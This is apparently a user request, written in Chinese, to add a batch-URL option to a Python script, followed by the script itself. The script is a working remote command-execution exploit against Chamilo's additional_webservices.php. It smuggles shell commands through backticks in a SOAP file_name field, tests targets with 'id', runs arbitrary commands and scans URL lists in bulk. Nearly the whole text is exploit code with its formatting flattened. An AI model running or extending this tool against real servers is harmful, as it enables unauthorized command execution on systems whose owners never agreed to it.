添加一个-f选项，批量检测url.txt文件里的url的功能

import argparse import requests

def execute_command(url, command): body = ''' <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">SOAP-ENV:Bodyns1:wsConvertPptfile_datafile_name{}`.pptxservice_ppt2lp_size720x540</ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, command)

try:
    response = requests.post('{}/main/webservices/additional_webservices.php'.format(url), data=body, headers={
        'Content-Type': 'text/xml; charset=utf-8',
    })
except:
    return False

if response.status_code == 200 and "wsConvertPptResponse" in response.text:
    return True
else:
    return False

def check_vulnerability(url): if execute_command(url, 'id'): print(f"URL vulnerable: {url}") else: print(f"URL not vulnerable: {url}")

def execute_commands(url, commands): for command in commands: if execute_command(url, command): print(f"Command executed: {command}") else: print(f"An error has occured, url is not vulnerable: {url}")

parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="Url of your Chamilo", required=False) parser.add_argument("-c", "--command", help="Command to execute", required=False) parser.add_argument("-f", "--file", help="File containing urls to check", required=False)

args = parser.parse_args()

if args.file is not None: with open(args.file, 'r') as f: urls = f.readlines() for url in urls: check_vulnerability(url.strip()) elif args.url is not None: if args.command is None: check_vulnerability(args.url) else: execute_commands(args.url, args.command.split(',')) else: print("Please specify a url to check with -u or --url, or a file containing urls with -f or --file"